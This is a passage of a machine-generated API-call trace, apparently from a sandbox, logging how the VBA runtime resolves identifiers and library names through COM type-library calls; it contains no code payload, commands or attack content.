[0069.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81106, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jAAAAA") returned 7 [0069.582] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jAAAAA", lHashVal=0x102298, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.582] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.583] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81106 | out: _Dst=0x67c2d40) returned 0x0 [0069.583] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jAAAAA") returned 0x109d41 [0069.583] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_jAAAAA" | out: _Dst="_B_var_jAAAAA") returned 0x0 [0069.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_jAAAAA") returned 14 [0069.583] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.583] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jAAAAA", lHashVal=0x109d41, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.583] IUnknown:Release (This=0x665ba50) returned 0xd [0069.583] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.583] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jAAAAA", lHashVal=0x109d41, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.583] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.583] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.583] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jAAAAA", lHashVal=0x109d41, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.583] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.583] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.583] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jAAAAA", lHashVal=0x109d41, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.583] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.583] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.583] IUnknown:Release (This=0x665ba50) returned 0xd [0069.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87025e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_jAAAAA") returned 14 [0069.583] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jAAAAA", lHashVal=0x109d41, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.583] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81106 | out: _Dst=0x144ec0) returned 0x0 [0069.583] ITypeComp:RemoteBind (in: This=0x665ba60, szName="T4ABoAAA", lHashVal=0x10ae1d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8112e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="T4ABoAAA") returned 9 [0069.584] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="T4ABoAAA", lHashVal=0x10ae1d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8112e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="T4ABoAAA") returned 9 [0069.584] ITypeComp:RemoteBind (in: This=0x665bd30, szName="T4ABoAAA", lHashVal=0x10ae1d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.584] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="T4ABoAAA") returned 0x10ae1d [0069.584] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="T4ABoAAA" | out: _Dst="T4ABoAAA") returned 0x0 [0069.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="T4ABoAAA") returned 9 [0069.584] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.584] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="T4ABoAAA", lHashVal=0x10ae1d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.584] IUnknown:Release (This=0x665ba50) returned 0xd [0069.584] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.584] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="T4ABoAAA", lHashVal=0x10ae1d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.584] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.584] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.584] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="T4ABoAAA", lHashVal=0x10ae1d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.584] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.584] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.584] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="T4ABoAAA", lHashVal=0x10ae1d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.584] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8112e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="T4ABoAAA") returned 9 [0069.584] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="T4ABoAAA", lHashVal=0x10ae1d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.584] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.584] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b8112e | out: _Dst=0x67c2d40) returned 0x0 [0069.584] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_T4ABoAAA") returned 0x1085a6 [0069.584] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_T4ABoAAA" | out: _Dst="_B_var_T4ABoAAA") returned 0x0 [0069.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_T4ABoAAA") returned 16 [0069.585] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.585] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_T4ABoAAA", lHashVal=0x1085a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.585] IUnknown:Release (This=0x665ba50) returned 0xd [0069.585] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.585] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_T4ABoAAA", lHashVal=0x1085a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.585] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.585] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.585] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_T4ABoAAA", lHashVal=0x1085a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.585] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.585] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.585] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_T4ABoAAA", lHashVal=0x1085a6, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.585] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.585] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.585] IUnknown:Release (This=0x665ba50) returned 0xd [0069.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87028e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_T4ABoAAA") returned 16 [0069.585] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_T4ABoAAA", lHashVal=0x1085a6, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x6f004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x6f004200000000, pDummy=0x0) returned 0x0 [0069.585] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8112e | out: _Dst=0x144ec0) returned 0x0 [0069.585] ITypeComp:RemoteBind (in: This=0x665ba60, szName="pABADG", lHashVal=0x1070ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8115a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="pABADG") returned 7 [0069.585] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="pABADG", lHashVal=0x1070ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8115a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="pABADG") returned 7 [0069.585] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pABADG", lHashVal=0x1070ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.586] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pABADG") returned 0x1070ef [0069.586] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="pABADG" | out: _Dst="pABADG") returned 0x0 [0069.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="pABADG") returned 7 [0069.586] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.586] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pABADG", lHashVal=0x1070ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.586] IUnknown:Release (This=0x665ba50) returned 0xd [0069.586] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.586] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pABADG", lHashVal=0x1070ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.586] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.586] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.586] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pABADG", lHashVal=0x1070ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.586] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.586] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.586] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pABADG", lHashVal=0x1070ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.586] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8115a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="pABADG") returned 7 [0069.586] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pABADG", lHashVal=0x1070ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.586] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.586] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8115a | out: _Dst=0x67c2d40) returned 0x0 [0069.586] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pABADG") returned 0x10eb98 [0069.586] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_pABADG" | out: _Dst="_B_var_pABADG") returned 0x0 [0069.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_pABADG") returned 14 [0069.586] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.586] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pABADG", lHashVal=0x10eb98, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.586] IUnknown:Release (This=0x665ba50) returned 0xd [0069.586] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.586] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pABADG", lHashVal=0x10eb98, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.586] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.586] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.587] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pABADG", lHashVal=0x10eb98, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.587] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.587] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.587] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pABADG", lHashVal=0x10eb98, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.587] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.587] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.587] IUnknown:Release (This=0x665ba50) returned 0xd [0069.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8702be, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_pABADG") returned 14 [0069.587] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pABADG", lHashVal=0x10eb98, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0069.587] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8115a | out: _Dst=0x144ec0) returned 0x0 [0069.587] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.587] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.587] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.587] IUnknown:Release (This=0x665ba50) returned 0xd [0069.587] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.587] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.587] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.587] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.587] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.587] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.587] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.587] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.587] IUnknown:Release (This=0x665ba50) returned 0xd [0069.587] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.588] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.588] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.588] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.588] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.588] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.588] IUnknown:Release (This=0x665ba50) returned 0xd [0069.588] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.588] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.588] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.588] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.588] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.588] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.588] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.588] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.588] IUnknown:Release (This=0x665ba50) returned 0xd [0069.588] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.588] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.588] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.588] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.588] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.589] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.589] IUnknown:Release (This=0x665ba50) returned 0xd [0069.589] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.589] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.589] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.589] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.589] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.589] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.589] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.589] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.589] IUnknown:Release (This=0x665ba50) returned 0xd [0069.589] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.589] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.589] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.589] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.589] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, 